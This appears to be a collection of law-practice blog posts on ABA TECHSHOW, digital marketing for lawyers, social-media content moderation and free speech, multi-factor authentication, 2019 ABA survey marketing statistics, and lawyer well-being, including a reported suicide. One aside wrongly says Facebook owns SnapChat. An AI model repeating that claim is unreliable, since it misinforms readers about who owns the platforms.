There was a lot of conversation before, during and after TECHSHOW about the future of legal tech conferences, especially ABA TECHSHOW itself. Before the conference began, our friends Tom Mighell and Dennis Kennedy recorded a Legal Talk Network podcast on-site on the TECHSHOW EXPO floor discussing the future of legal tech conferences. You may listen to the podcast here.

During the conference, we talked at length with other members of the faculty, attendees and exhibitors about the future of ABA TECHSHOW.

After the conference, Bob Ambrogi wrote a thoughtful piece in Above the Law entitled “After 33 Years, The ABA TECHSHOW Remains Relevant and Essential”.

Let’s start with the Legal Talk Network podcast. Tom and Dennis attend a lot of conferences and noted that conferences should regularly try new things. Some conferences are responding to the desire for lower cost education by doing them online, but, as Dennis noted, you risk losing the attention of attendees who are at work and apt to be answering emails and doing other work while theoretically attending. He likes the idea of video conferences and collaborating with colleagues.

Brand new conferences have to struggle to get traction. Happily, that wasn’t a problem for TECHSHOW. After 33 years, TECHSHOW has an enviable brand.

Many conferences these days seem focused on innovation, but as Tom points out, there are always lawyers who need training in the fundamentals of using Microsoft Word and other core software applications. They are not yet thinking about artificial intelligence or blockchain and the practice of law. But of course some people are more advanced and want different conference sessions so TECHSHOW had to present a lot of diverse offerings.

Let’s face it, the large firms are primarily focused on LegalWeek. There you find the vendors who cater to large firms. Smaller firm lawyers stopped going to LegalWeek because it didn’t feel like “their place.” It was seen more as a networking event for the larger firms. Besides, New York is really expensive for solo/small firm lawyers.

ILTA is a terrific conference, but more geared to the technical folks in law firms than the practicing lawyers.

TECHSHOW educates on practical legal technology but also focuses on the future of law practice. Every year, it works to stay relevant and hip, targeting different audiences and the ever-changing need of lawyers. As an example, Wellness and Future Proofing tracks made an appearance this year.

Though both Tom and Dennis like conferences where there is a lot of interaction, they acknowledge that they tend to be smaller conferences. Big conferences, by necessity, have to stay at a fairly high level. There is no way you can become an expert in blockchain in one hour, but you may absorb the basics and be able to follow up on more specifics post-conference through reading, webinars, etc.

As Tom notes, you’ll never satisfy 100% of the people, which is why the TECHSHOW Planning Board pays careful attention to evaluations to see which subjects, speakers and events resonated with the audience.

Without question, TECHSHOW attendees struggle with so many educational tracks, often finding that there are multiple sessions at the same time that they wish they could attend. That’s a good problem to have in many ways. You get the written materials and the PowerPoints for every session and you can look for webinars after the conference if you want to pursue a particular topic.

Sometimes, TECHSHOW doesn’t ask for CLE credit for a session but finds that there is good attendance anyway because the topic is so compelling. TECHSHOW has experimented with communities of lawyers in the same area of practice or interested in particular legal tech topics, which offers more in the way of networking opportunities. Its Academic Track has recently grown very popular. Attracting attendees from additional diverse areas of law (e.g. law students and educators) was a conscious decision of the Planning Board, which this year doubled the Academic Track to a full two days.

As a large conference, TECHSHOW works to make sure there are social events to meet people, including receptions, Taste of TECHSHOW dinners, Yoga, a 5K run and other social events. It now has Start-up Alley showcasing new legal tech products and services (hat tip to Bob Ambrogi for moderating the opening-night startup pitch competition). It has the Law Practice book booth. The EXPO Hall is an education in and of itself. TECHSHOW is famous for its open and inviting speakers – faculty members are well known for being receptive to conversations outside of sessions. And we have the “On the Road” podcast reporting from Legal Talk Network available during and after the conference, another fantastic addition to traditional conference education.

As Bob Ambrogi noted in his article, TECHSHOW’s challenge is to attract savvy legal tech lawyers who are chasing the future as well as newbies who need rudimentary technology training – and everyone in between. It certainly pleased us that Bob thought that TECHSHOW achieved the right balance this year.

Cost is always a consideration when planning a conference. Striking a balance of delivering relevant quality content for an affordable price to attendees is always on the minds of conference planners. TECHSHOW couldn’t achieve such success without the sponsorship and participation of all the vendors. This year there were 75 first time vendors to TECHSHOW and the EXPO continues to expand each year.

Of course, one of our favorite parts of TECHSHOW is that we get to visit with so many of our Canadian friends – and we’re always happy to make more Canadian friends – so mark your calendars for ABA TECHSHOW 2020 on February 26-29!

“We don’t believe in digital marketing. We believe in marketing in a digital world.” – Clive Sirkin, CMO of Kimberly Clark

And a digital world it is. We live in a world where three year olds have their own tablets (and operate them quite expertly, thank you very much) and people can work on a project across the globe from their kitchen table in their pajamas. While it is an exciting time, it is also a very challenging time to reach people and to stand out effectively in the crowd. Understanding Mr. Sirkin’s quote is a great first step. The basics of marketing have not changed (networking, creating/maintaining client relationships, word of mouth, etc), but the world in which we market has. It’s a fast-paced, ever-evolving digital world and lawyers must stay vigilant, educated, creative, and honest to stay in the game.

The Basics

At the very least, every lawyer and firm should have a website and email address. And NOT an AOL or Gmail address. These days, you must have an email address with your own domain to appear credible to potential clients. The website should look professional (no cheesy clip art, no gavels or scales of justice) and give clear information on who you are and what you do. It should also have an easy way to contact you. There are tons of options for website hosts these days that are affordable and user-friendly, so there really is no excuse for firms not to have one.

While a website is a basic step, it is an imperative one. Your website will serve as your cornerstone in the digital world. It will either be the first thing potential clients will see as they search for a service online or it will be where they come back to after seeing something on social media (yes, we will get to that). Your website can make or break the transition from potential client to actual client. If you don’t know about Search Engine Optimization (SEO), you have two choices – hire someone who does or invest a good chunk of time to bring yourself up to speed.

Social Media

Now we enter the overwhelming world of social media. There are so many different social media sites to choose from and they all have different layouts, themes, focuses, etc. One commonality is that they are an essential tool for marketing in a digital world. You as a lawyer and/or your firm (preferably both) need to be on social media. You can make a personal and company page on most social media sites and it’s highly recommended that you do so (if you have not already). Your presence on these sites will increase your digital footprint and allow for more opportunities for a potential client to contact you and your firm.

With all of the choices out there, it is important to find the right venues for you and your firm. Instagram is all about pictures, YouTube is all videos, LinkedIn is heavily focused on professional connections, Twitter is lightning speed news and information sharing, while Facebook is all of the above. These are all great places for potential clients to get a first glimpse, not to mention see reviews, read conversations and articles you post, and get to know you. However, whichever sites you choose, you must have a plan to stay active on those accounts. Be sure to share your own material, but also interact with others by commenting, liking, sharing/retweeting, and tagging. Having a page (or multiple pages) is great, but you must be an active participant for this effort to be effective. Perhaps dedicate a small portion of your day, 20 minutes or so, to this form of marketing.

Remember, quality over quantity is key. While posting more frequently can help to get your firm more “hits”, these hits don’t usually convert to leads or business all that often. It’s the quality of a post or content that will take your efforts further and convince people to share your work or contact your firm. This also holds true for the number of followers you have. It’s easy to be discouraged if you only have a few hundred followers while other firms or businesses have thousands. Keep in mind, users can buy followers or many of those followers could be bots or inactive accounts. If you are having great conversations and making new contacts on your social media sites, then you are doing quality work.

If you are a solo lawyer or small firm worried about having the time to do this, there are social media managers out there like Hootsuite or Buffer. However, these are frowned upon by marketing experts since these managers cannot customize posts for each platform (they are not human). These managers also cannot converse with followers or share posts, which are important elements of a successful social media presence. But for a lawyer in a pinch, social media managers as a digital tool can be very helpful. Wait, did someone say digital tool?

Digital Tools

So you have your website, email, and you are on social media. Now what? All of these steps will help your organic reach out in the digital world, but if you want to increase your reach and up your SEO there are tools out there to help. The list of options is long, so here are just a few top contenders for you to consider.

First, videos are arguably the most popular form of content online right now. While an adorable dog howling “I love you” may be what you are thinking of, lawyers can use videos too in order to set themselves apart. For instance, videos are a great way to newsjack. Newsjacking is “the practice of taking advantage of current events or news stories in such a way as to promote or advertise one’s product or brand.” Many times, news stories are lacking the legal perspective of a situation, so if you can be the person to give it, you can attract great attention. You could do this in blogs or articles as well, but videos are a great way to get news out there quickly. You could use FB live, Periscope (Twitter), Instagram Stories, YouTube, etc. to do these videos. Newsjacking is just one example of effectively using videos, but there are many others. How-to videos, newsletter videos, customer references, and short, concise interviews can be beneficial as well.

Next, we’ve all heard the phrase “there’s an app for that” and well, it’s true. All of the above mentioned social media and video streaming options are themselves apps or they have apps. There are scheduling apps, fitness apps, note-taking apps, communication apps, weather apps… you get the idea. The list is endless. Some law firms have created and customized their own apps. Now that is a little extreme, and beyond the financial reach of most small firms, but it gives you an idea of the possibilities. Just as with social media, you need to find the apps that work for you and your firm. Want to make your photos look nicer? Get a photo editor app. Need to organize your contacts and leads better? Download an app for that. Just make sure the apps you want are made by reputable companies and have good reviews before you download them. If you end up downloading an app that your phone or computer software then identifies as a “low reputation” app, uninstall it and look again!

Last but not least are online advertisements. The days of billboards and park bench signs are dwindling. Today, you can run ads on Google, any social media venue, blogs, new sites, etc. You can customize these ads to target certain keyword searches or audience demographics. Facebook even has a specific “lead generator” ad you can run. Now lawyers may see dollar signs when they hear the word “advertisement”, but online ads don’t necessarily have to be expensive. Of course, the more money you can spend on them, the better, but you can still push out a great ad and not break the bank. It may take a little time to find the most beneficial venue and advertisement for your firm, but your time will be well invested.

Test, Track, Analyze

None of the above-mentioned techniques or venues are worth anything unless you test, track, and analyze your marketing efforts. Testing, tracking and analyzing results is marketing 101 and as we established at the beginning of this article, we still need to implement basic marketing strategies… we are just doing it in a digital era now.

Luckily, tracking is fairly easy these days thanks to tools like Google Analytics. You can track all the activity on your website – where did a user come from? Which page(s) did they visit? How long did they stay? Every social media site has a “Analytics” tab or section for you to view how well posts performed, how many “likes” you received, how many new followers you gained, etc. Any ad you run online should have a report to access at the end of your campaign. So the “how” is easy, but the difficult part is the “doing.” Lawyers must track these results in order to see what is working and what may need to be improved or stopped. Without this critical step, all of your marketing efforts are for naught because you are not measuring you return on investment (ROI) with respect to both money and time.

It’s also important to remember that trying something new, testing it out, tracking and analyzing it to conclude that it does/did not work does not mean it is a complete failure. In the legal world, where lawyers either win or lose cases and have definitive lines of success versus failure, it’s easy for them to feel defeated when something does not work out exactly as they were hoping. Mistakes are learning tools. You know that test did not work, so move on and tweak it or try something new. “Rome wasn’t built in a day” and neither was any effective marketing strategy!

Human Connection

If there is one point you take away from this article, let it be this… humans need human connection. The most effective marketing strategies in the digital era will involve strong human connections. In a world where everything is becoming more and more automated and digital, these primal connections will become increasingly important.

So what does this mean for lawyers and marketing? Let people know why you are practicing law. What drives you? Show your human side on social media – do you have hobbies? Favorite recipes you can share? Are you a member of charitable organizations? There are so many different ways you can reach people and make connections by just being you. As in all things digital, be careful not to overshare – common sense will guide you.

Where does honesty comes into play?. Do not push a persona that is not you because you think it is more marketable. You need to be able to live up to the expectations you set online. Being someone’s lawyer is a both a professional and a personal relationship, so why not give potential clients a preview of who they are hiring? And never forsake any connection, unless they prove problematic in some way. You may connect with someone who does not need a lawyer at the time, but that may change or they may end up recommending you to a friend who needs legal assistance. Jayson Gaignard, a Canadian entrepreneur & networking specialist said, “…in today’s day and age we are drowning in contacts, but we are starving for connection.” If you can build that bridge from contact to connection, you will foster and maintain very meaningful and beneficial relationships for you and your practice.

What Works for Us?

As stated previously, finding what marketing efforts work for your law practice will take some trial and error. We have been at this a while now and while we are not a law firm, our findings and best practices could be beneficial to lawyers and law firms. One of our most popular marketing and networking items is Sensei Sherlock. He is a stuffed Scooby Doo (dressed as Sherlock Holmes) that we take with us when we give presentations or travel for work. We take pictures of him at various events and with various people. Then we post these pictures on our social media accounts and on our website. We make sure to tag the person/people in the photo and/or link to their company/firm. We have had great networking and human connection successes from this! People eagerly request to have their picture taken with him now.

Other popular social media posts involve eye-catching photos or headlines, happenings around our office (employee promotion, decorating contests, etc.), and funny technology themed comics. We also see greater reach and engagement numbers when our employees (particularly, our President) share posts from our company page to their personal pages. This is extremely helpful especially if you have an employee with a large number of followers – the more eyes on posts, the better!

Sensei also produces blog posts, podcasts, and articles (like this one) that aid in our marketing efforts. These help in getting our name out there and often lead to contacts from the media or prospective clients. We push these out on social media as well and tag, link to whomever we can. People are very grateful to see themselves tagged, linked to, etc. As you can see, everything we do goes on social media.

While we have experienced positive returns on most of our efforts, not everything is a success. We are constantly tracking and experimenting with changing features or new ideas. Something may work for a while and then suddenly not work, so we have to stay alert and be ready to switch directions if needed. Luckily, we have a great marketing team that keeps the ship on course!

A Word of Warning & Conclusion

We would be amiss not to warn lawyers of the possible perils of a large digital footprint. The more information you put out on the internet, the more susceptible you are to cybercriminals doing their best to steal your data (among other things). In this case, make sure you use well-reviewed, secure apps, don’t overshare on social media, and give out only work contact information. Be sure to take steps to keep yourself, your firm, and your clients safe online.

In conclusion, the basic principles of marketing have not changed much over the years but the mediums have evolved at dizzying rates. Do your best to keep up with the changes, educate yourself, come up with creative ways to stand out, stay safe, and be authentic! There is a pot of gold at the end of the marketing rainbow!

The Electronic Frontier Foundation (EFF) announced on May 20th that it had launched TOSsed Out, a new iteration of EFF’s continuing work in tracking and documenting the ways that Terms of Service (TOS) and other speech moderating rules are unevenly applied to people by online services. Sometimes, posts are deleted. Sometimes accounts are banned. For many people, the internet represents an irreplaceable forum to express their ideas, communicate with others, etc.

We have long been fans of the EFF and were delighted to hear that cybersecurity guru Bruce Schneier is leaving IBM, in part to focus on teaching cybersecurity to the next generation but in part to focus on his role as a public interest cybersecurity specialist. Since he is already on the board of the EFF, he is in a great position to be of help.

But back to TOSsed Out, which follows in the path of Onlinecensorship.org, which EFF launched in 2014 to collect reports from users in an effort to encourage social media companies to operate with greater transparency and accountability as they regulate speech. TOSsed Out will focus on the ways that people are negatively affected by these rules and their erratic enforcement.

Commercial content moderation practices negatively affects lots of folks, especially people who are marginalized. This includes black women who share their experiences of racism to sex educators whose content is deemed too explicit. TOSsed Out’s mission is to show that trying to censor social media ends up removing legal, protected speech.

You can find the TOSsed Out website at https://www.eff.org/tossedout. It provides some examples of online content moderation gone astray – with future examples to be added. The EFF is attempting to make clear the need for companies to embrace the Santa Clara Principles which it created to establish a human rights framework for online speech moderation, require transparency about content removal, and specify appeals processes to help users get their content back online. Those are all good objectives and we support the Principles. As of June 2019, three of the largest internet platforms—YouTube, Facebook, and Twitter—began to implement the recommendations outlined in the Principles.

There has, however, been a movement to apply the First Amendment to private companies in spite of the fact that it applies only to governmental speech. Of course, it makes perfect sense that Facebook pages and Twitter accounts, which are made public forums by politicians, are subject to the First Amendment. By way of example, see Knight First Amendment Institute v. Trump, in which the court ruled that the President could not block followers who expressed opposing points of view – note that the case is on appeal and was argued on March 26, 2019 in the U.S. Court of Appeals for the 2nd Circuit.

It is true that we now live in a world where private social media entities can limit, control and censor speech as much or more than governmental entities. There has been a growing number of people advocating that the First Amendment should be extended to cover these entities.

The new thesis is that when a private actor has control over online communications and online forums, these private actors are analogous to a governmental actor. The notion is that the U.S. Supreme Court should relax the state action doctrine and interpret the First Amendment to limit the “unreasonably restrictive and oppressive conduct” by private entities such as social media entities – that censor freedom of expression.

Some conservatives believe that the majority of tech entrepreneurs are liberal. They ask: Do their algorithms, which search for and remove objectionable content, contain biases?

But extending the First Amendment to private businesses is controversial and does not seem to be a majority position. These businesses have discretion over the content they wish to promote or forbid.

In any event, one hurdle to applying the First Amendment to social media companies, mentioned above, is the state action doctrine, a key concept in constitutional law. This was examined in the April 2019 ABA Journal, which noted the U.S. Supreme Court explained in the Civil Rights Cases (1883) that the 14th Amendment limits “state action” and not “individual invasion of individual rights.” Translated, this means that the Constitution and the Bill of Rights limit the actions of governmental actors, not private actors.

Just last year, a federal district court in Texas affirmed that traditional view, ruling in Nyabwa v. Facebook that a private individual could not maintain a free speech lawsuit against Facebook, stating that “the First Amendment governs only governmental limitations on speech.”

Most legal experts view it as unlikely that social media platforms will be held to First Amendment constraints, believing that no court could see these platforms as being fully state actors subject to the First Amendment.

Most social media forbids hate speech that offends or attacks people on the basis of race, ethnicity, national origin, religions, gender, sexual orientation, disability disease or other traits. Social media is very cognizant of the controversy surrounding their policies. Let’s look at Facebook, the big kahuna of social media. Facebook is certainly trying, especially recently, to establish a balance between freedom of speech and unacceptable speech.

On its community standards page, (https://www.facebook.com/communitystandards/, Facebook acknowledges that striking a balance is an ever-evolving effort.

Twitter has a Hateful Content Policy which may be found at https://help.twitter.com/en/rules-and-policies/hateful-conduct-policy. Its general guidelines and policies may be found at https://help.twitter.com/en/rules-and-policies#general-policies.

Legally speaking, social media companies are not compelled to do anything about hate speech. 72% of respondents to a June 2018 Pew Research Center survey believe that social media platforms actively censor political views that those companies find objectionable. https://www.pewinternet.org/2018/06/28/public-attitudes-toward-technology-companies/.

There is increasing pressure on social media to stamp out hate speech. A lot of that pressure comes from advertisers who do not want to be affiliated with a platform that allows it.

Facebook (which owns Instagram, SnapChat and WhatsApp), Twitter and YouTube have hired thousands of new moderators to filter out content in violation of their standards. Moderators are inconsistent. There are Facebook users whose posts on racial issues were deleted by Facebook but white friends, when posting the same posts, did not have their posts deleted.

The Silicon Valley mindset is that every problem can be solved by algorithms – the current thinking is that the solution is at hand but they just haven’t gotten it quite right yet.

Social media and other providers are now thinking about the broader social impact of their platforms and the possibility that they might be regulated if they don’t act.

For those interested in this subject, on March 27, 2019, the Congressional Research Service released a report entitled Free Speech and the Regulation of Social Media Content (https://fas.org/sgp/crs/misc/R45650.pdf), a 43-page document which takes an extensive look at some of the issues we have raised.

Facebook and YouTube are currently in a dither about what to do with deepfake videos which are getting harder and harder to detect as the technology improves. Furthermore, on June 5, 2019, YouTube announced plans to remove thousands of videos and channels that advocate neo-Nazism, white supremacy and other bigoted ideologies in an attempt to clean up extremism and hate speech.

The new policy will ban “videos alleging that a group is superior in order to justify discrimination, segregation or exclusion,” the company said. The prohibition will also cover videos denying that violent events, like the mass shooting at Sandy Hook Elementary School in Connecticut, took place. This is sure to reignite the debate about whether the First Amendment should be extended to private companies.

People rely on internet platforms to share experiences and build communities, and not everyone has good alternatives to speak out or stay in touch when a tech company censors or bans them. Rules need to be clear, processes need to be transparent, and appeals need to be accessible.

Amen to all of that. But regulation may not be the answer and it may present its own dangers. It is currently a sea of confusion with no clear channel markers in sight.

It was big news in late August when Microsoft said that users who enable multi-factor authentication (MFA) for their accounts will end up blocking 99.9% of automated attacks. This doesn’t apply just to Microsoft accounts. It applies to any other account on any website or online service.

Today, virtually all service providers support multi-factor authentication, and in most cases, there is no charge. It can be something as simple as SMS-based one-time passwords or advanced biometrics solutions.

“Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA,” said Alex Weinert, Group Program Manager for Identity Security and Protection at Microsoft.

Weinert said that old advice like “never use a password that has ever been seen in a breach” or “use really long passwords” doesn’t really help.

Weinert should know – his credentials are impressive. He was one of the Microsoft engineers who worked to ban passwords that became part of public breach lists from Microsoft’s Account and Azure AD systems back in 2016. As a result of his work, Microsoft users who were using or tried to use a password that was compromised in a previous data breach were told to change their credentials. These days, many providers will not allow to use a password that is known to have been compromised. So much for the ever-popular “123456.”

However, Weinert said that despite blocking leaked credentials or simplistic passwords, hackers continued to compromise Microsoft accounts. Why? Because today’s passwords or their complexity don’t really matter anymore. Hackers have many different methods that they use to get users’ credentials.

With over 300 million fraudulent sign-in attempts targeting Microsoft cloud services every day, Weinert says that enabling a multi-factor authentication solution blocks 99.9% of these unauthorized login attempts, even if hackers have a copy of a user’s current password. Now that’s impressive.

The 0.1% number accounts for more sophisticated attacks that use technical solutions for capturing MFA tokens, but these attacks are still extremely rare compared to the daily grinding of credential stuffing botnets. What most lawyers fail to realize is how automated these attacks have become.

Microsoft’s claim that using MFA blocks 99.9% of automated account takeover (ATO) attacks isn’t the first of its kind. In May, Google said that users who added a recovery phone number to their accounts (and thus indirectly enabled SMS-based MFA) were also improving their account security.

“Our research shows that simply adding a recovery phone number to your Google Account can block up to 100% of automated bots, 99% of bulk phishing attacks, and 66% of targeted attacks that occurred during our investigation,” Google said at the time.

We get it – lawyers perennially want convenience over security – they are loathe to spend a previous few seconds enabling a second layer of security. We believe that many lawyers think they will have to employ multi-factor authentication every time they log in somewhere. Not necessarily true. In most cases, you can request that your provider remember your device (phone, laptop, etc.). It is only when someone tries to log on from an unknown device that you would, for instance, have to enter a code texted to your phone.

Think about it. If an unknown device is trying to access one of your accounts, you want very much to know about that and have a method of stopping it. That’s what MFA gives you – peace of mind.

And consider this: When both Google and Microsoft are recommending the same thing, it’s probably a good time to start following their advice.

We always look forward to the ABA Legal Technology Resource Center’s Annual Legal Technology Survey Report on the use of technology in the legal profession. The summary of the “Marketing and Communication” portion of the 2019 survey was recently published. It was written by our good friend Allison Shields and contains some fascinating (and worrisome) statistics.

Respondents to the 2019 Survey segment covering websites and law firm marketing were mostly solos or from smaller firms, consisting of 27% solos, 29% lawyers in firms of 2-9 lawyers, 18% from firms of 10-49 lawyers, 11% from firms of between 100-499 lawyers, 10% from firms with 500+ lawyers, and 5% from firms with 50-99 lawyers. The average age of respondents was 58 years old, with 55% of respondents identifying as 60+ years old, and another 24% between 50-59 years old. Wow, the graying of the profession is noteworthy – or do younger lawyers not participate in surveys?

The summary focuses on marketing and website trends mainly among firms with fewer than 50 lawyers. We think the survey is troubling in that it seems that many solo and small firm attorneys engage in “random acts of marketing” rather than having a cohesive marketing plan.

According to the 2019 Survey, only 47% of firms overall have a marketing budget. The largest firms are the most likely to report having such a budget (94% of those from firms of 100+ lawyers), and 61% from firms of 10-49 lawyers. However, only 31% of firms from 2-9 lawyers and 17% of solo respondents have firm marketing budgets.

From our foxhole, these stats are pretty much reflective of what we see in the real world. Solos and small firm lawyers struggle to keep their fundamental technology “semi” up-to-date. Their revenues just don’t seem to permit the luxury of having a marketing budget.

The leading channels for marketing across all firm sizes are email (41%), Facebook (30%), and direct mail (19%). Fewer than 15% of respondents overall report their firms use Avvo, Findlaw, Lawyers.com, or the Yellow Pages to market their practices, however, 25% of solos report using Avvo.

Frankly, we think Avvo may have peaked. It will be interesting to see next year’s numbers. Consistently, solo and small firm lawyers have reported aggressive marketing by Avvo which may contribute to the number of lawyers using it.

Solos most often use email (40%) for their marketing, followed by Facebook (26%) and Avvo (25%). Facebook was the most popular for lawyers from firms of 2-9 lawyers at 39%, followed by print at 33%. In firms of 10-49 lawyers, respondents reported using email most often (47%), followed by print (41%). LinkedIn was not included as one of the channels in this survey question, which we find odd. When we poll audiences, LinkedIn is frequently mentioned as a valuable marketing tool.

Only 57% of solos have a firm website, while over 90% of respondents in all other firm sizes report having a firm website. This is disturbing in a time when prospective clients are often searching online (via their computer or smartphone). Of those solos who do have a website, we think it’s a good bet than many of those websites are not optimized for mobile device display, which is all but required in today’s world.

Although most firms report they have not used video in their marketing, the numbers show an increase in the adoption of video. 26% of respondents said their firms use video as part of their marketing, and 65% have not yet adopted video marketing. Naturally, the largest firms (100+ attorneys) are most likely to use video – but then of course they have the budget for it. Only 4% of solos use video – and the quality tends to be low among smaller firms.

30% reported this year that their firm has a blog. Only 9% of solos have a blog. Our guess is only the big firms (in general) tend to have regular posts. There are many, many legal blogs where the last post was made months ago – not a good reflection on the firm. The survey reports that 56% update their blogs monthly and 18% update it weekly. 21% have stopped updating their blog completely and some have others do their blog posts for them.

80% of firms have a presence on social media. LinkedIn leads at 79%, followed by Facebook (54%), Martindale (38%), and Avvo (23%). Reported use of Facebook and Avvo has declined over the past year; in 2018, 63% of respondents reported their firms maintained a Facebook presence, and 36% maintained a presence on Avvo.

80% of respondents use social media themselves for professional purposes, including 67% of solos, 83% of lawyers in firms of 2-9 lawyers, and 86% of lawyers in firms with 10-49 lawyers. LinkedIn is the leading platform – 73% of all respondents maintain a LinkedIn presence.

Overall, only 39% of respondents who participate in social media report using Facebook (that’s a significant drop from 47% in 2018). Solos and small firm lawyers use Facebook for professional purposes more often than lawyers in larger firms; 50% of solos and 48% of lawyers in firms with 2-9 lawyers report using the platform, as compared with only 26% of lawyers in firms with 10-49 lawyers.

Just 28% of respondents report using Twitter, including 31% of lawyers from firms between 10-49 lawyers, 28% of lawyers in firms with 2-9 lawyers, and only 19% of solos reported using the platform.

“Handling” marketing still lies largely with the attorneys themselves. 59% of respondents, including 60% of solos, said attorneys perform these functions within the firm. Only 31% of firms overall have internal marketing staff, and 17% use outside consultants, while 16% report that administrative staff performs marketing functions for the firm. 13% of respondents say “no one” is responsible for marketing in their firms, including 30% of solos and 13% of respondents in firms of 2-9 lawyers.

Only 7% of all respondents indicated that their firms were using AdWords (that certainly proved to be pouring money down a rathole for us). Overall, 59% of respondents report that their firms do not use a consultant for SEO, AdWords/PPC (Pay Per Click), or social media.

Why do lawyers blog and use social media? Pretty much the same answers – 67% said they did these things for career development and networking and 49% said for client development. Thirty-eight percent of respondents say they have access to analytics or reports to monitor the effectiveness of their website or blog. 41% do not have such access and 21% do not know. Our own experience with clients is that very few monitor the SEO effectiveness of their blog or website, especially at the solo/small firm level.

Of those respondents who report maintaining a legal topic blog, 49% have gotten clients as a result of blogging and another 34% do not know whether they have gotten a client or not. Of those who used social media for professional purposes this year, 31% report having gotten clients as a result, 44% say they did not, and 24% did not know. Solos (35%) and lawyers from firms of 2-9 lawyers (34%) were the most likely to report having gotten clients through social media, followed by lawyers from firms of 10-49 lawyers (28%) and firms of 100+ lawyers (29%). Only 3% of Twitter users reported getting clients from their use of Twitter.

Overall, across all firm sizes, on a scale of 1 (not at all confident) to 5 (very confident), respondents placed their level of confidence in their firm’s marketing efforts at 2.9. We would have said that the confidence level is lower than that!

It amazes us how many people leave marketing to others. We suppose time constraints are one huge reason. The outsourced efforts often seem to falter without attorneys closely managing them – which of course defeats part of the purpose of outsourcing. And firms are just terrible at tracking the return on their investment of both time and money.

In a highly competitive marketplace, solos and small firms have a long way to go, a fact underscored in the survey. We recommend that law firms schedule regular marketing meetings and develop a cohesive plan – and then follow it. We flounder ourselves now and again when the workload is overwhelming, so we understand how hard it is to keep one’s nose to the ground – but organized marketing always pays off!

ABA RESOLUTION 105

The ABA House of Delegates adopted Resolution 105 at the 2018 ABA Midyear Meeting. The resolution supports the goal of reducing mental health and substance use disorders and improving the well-being of lawyers, judges and law students. It urges stakeholders within the legal profession to consider the recommendations set out in The Path to Lawyer Well-Being: Practical Recommendations for Positive Change. The pursuit of lawyer wellness has spread rapidly through law firms, bar associations, state bars and state supreme courts.

The National Task Force on Lawyer Well-Being, assembled in August 2016 to “create a movement toward improving the health and well-being of the legal profession,” defines lawyer well-being as a “continuous process whereby lawyers seek to thrive in each of the following areas: emotional health, occupational pursuits creative or intellectual endeavors, sense of spirituality or greater purpose in life, physical health, and social connections.”

The Task Force’s recommendations in their report entitled The Path to Lawyer Well-Being: Practical Recommendations for Positive Change, published in August 2017, focus on five central themes:

(1) identifying stakeholders and the role each of us can play in reducing the level of toxicity in our profession,

(2) eliminating the stigma associated with help-seeking behaviors,

(3) emphasizing that well-being is an indispensable part of a lawyer’s duty of competence,

(4) educating lawyers, judges, and law students on lawyer well-being issues, and

 (5) taking small, incremental steps to change how law is practiced and how lawyers are regulated to instill greater well-being in the profession.

The authors have monitored many of these developments – and now teach several CLEs related to lawyer wellness. We applaud the actions taken to date – and there is still so much to be done. We decided to write an article that highlights some of the developments since Resolution 105 was adopted, including several sad stories that have shaken the legal profession.

THE DEATH OF PAUL RAWLINSON

On April 16, 2019, The ABA Journal carried a story about the death of Baker McKenzie’s global chairman Paul Rawlinson. He had died four days earlier, six months after he took a temporary leave to deal with health issues caused by exhaustion. He was 56 years old at the time of his death.

When he took the leave, his firm was struggling with an inquiry into the firm’s handling of sexual harassment complaints and internal disagreement over associate pay. The firm at that time had 78 offices and nearly 5,000 attorneys. Reportedly, Rawlinson had visited more than half of those offices.

The exact cause of death was not released, but his death spurred the growing concern about lawyer wellness and the systematic pressures placed on many lawyers, especially at large law firms – and most especially those who lead those firms.

We do not suggest that Rawlinson’s wellness issues resulted in unethical behavior of any kind. It was simply a crushing and disturbing story, suggesting that a lawyer’s exhaustion could lead to their death. One thing we wondered – and still wonder – was whether there was a culture of wellness at Baker McKenzie and whether his colleagues had reason to suspect how unwell he really was. Have we, as a profession, become impervious to the symptoms of extreme stress on our colleagues?

THE SUICIDE OF GABE MACCONAILL

Attorney Gabe Macconaill, a 42-year old partner at Sidley Austin, committed suicide on October 14, 2018., His widow, Joanna Litt, wrote an open letter saying that “Big Law killed my husband.”

In this case, there were signals – episodic binge drinking, the departure of several close friends at the firm which created more pressure on him, a new position chairing the summer associate program, and then a huge bankruptcy case.

He became visibly stressed, anxious and wasn’t sleeping. When his wife called his closest colleague, she said he was working more and more with his door closed – and that his sense of humor had been gone for a while.

He told his wife that he felt like a phony who had fooled others about his abilities as a lawyer and he thought he would be fired at the end of the bankruptcy case. He worked himself to exhaustion, going to an ER with cardiac symptoms, but when early indications were that his health problems might be due to dehydration, he left the hospital without seeing a doctor so he could return to work.

His wife arranged a mobile IV to come to their home and give him fluids. He then flew to Delaware to file the bankruptcy case.

Here, ethics entered the situation because, as his wife found out later, he had stopped responding to work emails when he returned home to LA. Every lawyer reading that sentence knows how close someone must be to the edge of the precipice when they stop responding to work emails in the midst of a high value case.

On the last morning of his life, he kissed his wife goodbye, took his gun with him, and shot himself in the head in the garage of the firm’s high-rise office building.

His wife said that he set impossible high standards for himself, that he was a “maladaptive perfectionist” who lacked self-compassion. He said he couldn’t “turn off his head.”

She said, “He had a deep, hereditary mental health disorder and lacked essential coping mechanisms. But these influences, coupled with a high-pressure job and a culture where’s it’s shameful to ask for help, shameful to be vulnerable and shameful not to be perfect, created a perfect storm.”

Remember that these are the words of a grieving widow. The description of the law firm is certainly accusatory and we cannot know how much is an accurate depiction.

Sidney Austin told the press that the firm handled the situation well, and that it was MacConaill’s responsibility to come forward and ask for help when he was overwhelmed. The firm has a wellness program, but an anonymous source at the firm told Financial Times that folks at Sidley aren’t comfortable using it. The source said “There is not a culture or feeling of safety right now in that set of offices. You can have resources in place, but unless you have the right culture, people aren’t going to feel safe using them or approaching someone to ask for help.”

That assessment, if true, certainly cries out for remediation.

THE STRESS OF PRACTICING LAW TODAY

Clearly, the personal stories above had a profound impact on the authors. Author Nelson, a former president of the Virginia State Bar, worked on the VSB’s Special Committee on Lawyer Well-Being, chaired by then VSB President Len Heath, and was one of the many authors who worked on its May 2019 report, “The Occupational Risks of the Practice of Law.” For anyone who works on such endeavors, what one learns often comes as something of a revelation.

The demands of being a lawyer can often hide substance or mental health issues and the high-achieving people who become lawyers often do not avail themselves of available resources to help them. There is a stigma attached to asking for help and a fear that one will seem “weak” or perhaps not worthy of rising within the firm.

The authors live in Virginia but frequently lecture across the nation. We have heard a lot of sad stories. After one CLE, a lawyer in another state called to ask for help because, as he said, “I just can’t practice law anymore.” It is amazing to think how many ethical rules he must have violated, because he flatly acknowledged that he wasn’t able to adequately do his work for his clients.

